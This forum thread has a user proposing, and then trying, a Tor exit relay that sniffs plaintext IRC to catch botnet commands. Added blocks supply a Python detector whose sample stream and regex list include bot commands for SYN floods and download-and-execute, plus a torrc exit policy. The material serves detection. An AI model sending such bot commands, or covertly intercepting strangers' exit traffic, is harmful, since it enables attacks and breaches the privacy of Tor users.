Sneaky idea to find a botnet using Tor

Post by ayu »

So, a lot of us know (or should know) some of the issues with using Tor.
The nodes that are used to leave the network have to decrypt the traffic so that the data can be sent in its original state to whatever machine is receiving it.

And since anyone can be a part of the Tor network, this opens up opportunities.

Say you have a list of different commands used for different kinds of botnets (mainly public script kiddie ones), and then say you happen to have a server that is part of the Tor network and is an end node for a lot of traffic, meaning that the traffic leaves the machine unencrypted.

In the case of clear-text IRC botnets, one could make a simple script, or even a filter in Wireshark, to grab packets that contain certain clear-text commands, thus secretly sniffing out botnets.

Now, the question of whether this is ethical or not can be tricky, since it's basically exploiting the Tor service, but on the other hand, it's a way to catch bad guys.

The problem with this is that you have to be pretty clean yourself, since it means someone can abuse Tor through you and do "not so nice stuff", like downloading illegal material, breaking into servers, downloading child porn, etc. So the risk exists that you get some sort of complaint from your ISP if they don't notice that you are running a Tor relay.

Personally, I'm thinking about trying this and limiting the traffic pretty hard, so that people can't use the relay for much daily use. It will lower the chances of catching what I want, but at least it's safer. After all, I'm not that clean, and better safe than sorry.
"The best place to hide a tree, is in a forest"
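An added example of the "simple script" the post describes, not code from the post or from any Tor or botnet project: it parses raw IRC PRIVMSG lines as they would appear in the TCP payload leaving an exit node and flags message bodies that start with command patterns used by some public IRC bot families. The sample stream, the nicks, channels and addresses, and the command vocabulary are all constructed for the example; a real deployment would feed it reassembled TCP payload from a capture and keep its own command list.

```python
import re
from collections import Counter

# Constructed sample stream (not captured data): raw IRC lines with the usual
# ":prefix COMMAND target :trailing" shape. Nicks, channels and addresses are invented.
SAMPLE_IRC_STREAM = b"""\
:herder!~h@10.0.0.5 PRIVMSG #c2chan :.ddos.syn 203.0.113.9 80 300
:alice!~a@192.0.2.7 PRIVMSG #linux :anyone tried the new kernel?
:herder!~h@10.0.0.5 PRIVMSG #c2chan :.download http://198.51.100.4/x.exe 1
:bob!~b@192.0.2.8 PRIVMSG #linux :.downloads folder is on /home
:herder!~h@10.0.0.5 PRIVMSG #c2chan :!scan.start dcom 100 5 0 0 -r -s
:carol!~c@192.0.2.9 PRIVMSG alice :ddos attacks are in the news again
:bot0001!~b@10.0.0.77 PRIVMSG #c2chan :[SCAN]: Random Port Scan started on 192.0.2.x:135
"""

# Assumed command vocabulary (not a list from the post): command prefixes and
# status-report formats in the style of public script-kiddie IRC bots. Each
# pattern is anchored at the start of the message body, because the herder's
# command is the whole line; that keeps chat such as ".downloads folder ..."
# or "ddos attacks are in the news" from matching.
BOT_COMMAND_PATTERNS = [
    # flood commands followed by a target IP, port and duration
    re.compile(rb"^[.!](ddos|udp|syn|ping)\.?\S*\s+\d{1,3}(\.\d{1,3}){3}\s+\d+"),
    # download-and-execute: URL followed by a run flag
    re.compile(rb"^[.!]download\s+https?://\S+\s+[01]\b"),
    # scanner control
    re.compile(rb"^[.!]scan\.(start|stop|stats)\b"),
    # bot housekeeping
    re.compile(rb"^[.!](update|remove|die|reboot|login)\b"),
    # status lines the bots themselves report back into the channel
    re.compile(rb"^\[(SCAN|DDoS|DOWNLOAD)\]:"),
]

# Minimal PRIVMSG parser: optional ":nick!user@host " prefix, the command,
# the target (channel or nick), then the message body after " :".
PRIVMSG_RE = re.compile(
    rb"^(?::(?P<nick>[^!\s]+)\S*\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


def parse_privmsg(line: bytes):
    """Return (nick, target, text) for a PRIVMSG line, or None for anything else."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    return m.group("nick") or b"", m.group("target"), m.group("text")


def matches_bot_command(text: bytes) -> bool:
    """True if the message body starts with one of the assumed bot command patterns."""
    return any(p.match(text) for p in BOT_COMMAND_PATTERNS)


def find_bot_traffic(stream: bytes):
    """Scan a raw IRC byte stream and return the (nick, target, text) hits as str tuples."""
    hits = []
    for line in stream.splitlines():
        parsed = parse_privmsg(line)
        if parsed is None:
            continue
        nick, target, text = parsed
        if matches_bot_command(text):
            hits.append((nick.decode(errors="replace"),
                         target.decode(errors="replace"),
                         text.decode(errors="replace")))
    return hits


def summarize(hits):
    """Count hits per target so a busy C2 channel stands out from a one-off false positive."""
    return Counter(target for _, target, _ in hits)


if __name__ == "__main__":
    found = find_bot_traffic(SAMPLE_IRC_STREAM)
    for nick, target, text in found:
        print(f"{target:10} {nick:10} {text}")
    print(dict(summarize(found)))
```

The same first cut can be expressed as a Wireshark display filter on the IRC dissector's request field, for instance `irc.request contains ".ddos"`, but a string match anywhere in the line picks up ordinary chat about DDoS; anchoring the pattern at the start of the message body, as above, is what keeps the false-positive rate usable. Counting hits per target is the other practical filter: a real C2 channel produces a stream of commands and status reports, not a single line.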


Post by l0ngb1t »

Sounds interesting...
I'll ask my best friend about it, he'll help me for sure; his name is GOOGLE.
There is an UNEQUAL amount of good and bad in most things, the trick is to work out the ratio and act accordingly. "The Jester"


Post by ayu »

Ok, so I set up a Tor relay on a virtual machine running Debian, along with Wireshark to monitor the traffic. At the moment I'm not getting much exit node traffic, so right now my "awesome botnet filter" won't be needed, since if I even get one packet, I can check that one manually.

I will let this be for a little while, and see how it plays out.

PS: I disabled all traffic but the IRC traffic. Fewer results, but at least I get less abuse as well from the CP freaks over at 4chan.

I added a notice on the web server running on my network, along with a mail address where people could send abuse complaints if anything were to happen.

Now all I can do is wait ...
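An added torrc fragment, not the configuration from the post, showing how "all traffic but the IRC traffic" is expressed as a Tor exit policy. The directive names are standard Tor ones; the nickname, contact address, bandwidth figures and the choice of ports 6660-6669 as "IRC" are assumptions for the example. The TLS IRC port 6697 is deliberately left out: traffic exiting on it would still be encrypted, so there would be nothing to sniff and no reason to carry the abuse risk for it.

```text
# Added example torrc fragment (assumed values, not the post's own config).
Nickname botnetwatch
# Free-form contact line; Tor publishes it in the relay descriptor, which is
# where abuse complaints should be directed, as the post describes.
ContactInfo abuse AT example DOT com
ExitRelay 1
# Accept only the plaintext IRC port range. The final reject rule closes
# everything else, so the relay cannot be used for web browsing or downloads.
ExitPolicy accept *:6660-6669
ExitPolicy reject *:*
# Throttling keeps the relay unattractive for general use, as the post considers.
RelayBandwidthRate 100 KBytes
RelayBandwidthBurst 200 KBytes
```

The exit policy is evaluated top to bottom and the first matching rule wins, so the accept line must precede the catch-all reject. Clients that need other ports will simply not select this relay as their exit, which is why the post's own observation that exit traffic became scarce is the expected outcome of this configuration.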


Post by lilrofl »

It's a fun idea, certainly intriguing... good luck buddy!
cuddles for my sweetheart


Post by hpprinter100 »

I am confused, cats. Why would the IRC bot go through your Tor node? I thought most people just use Tor to browse the internet? I am probably missing something here.


Post by ayu »

hpprinter100 wrote: I am confused, cats. Why would the IRC bot go through your Tor node? I thought most people just use Tor to browse the internet? I am probably missing something here.
Not the bot, but the person controlling it might ^^


Post by ayu »

Update on this project.

So far I haven't captured anything interesting.
I'm thinking about setting up a permanent relay so that I can sniff traffic during a longer period of time, but I haven't decided on anything yet.

Anyway, the bottom line is that this idea works in theory; you just have to be lucky enough to get someone to use your relay as an exit node, and someone who is stupid enough to send commands to a botnet through it.
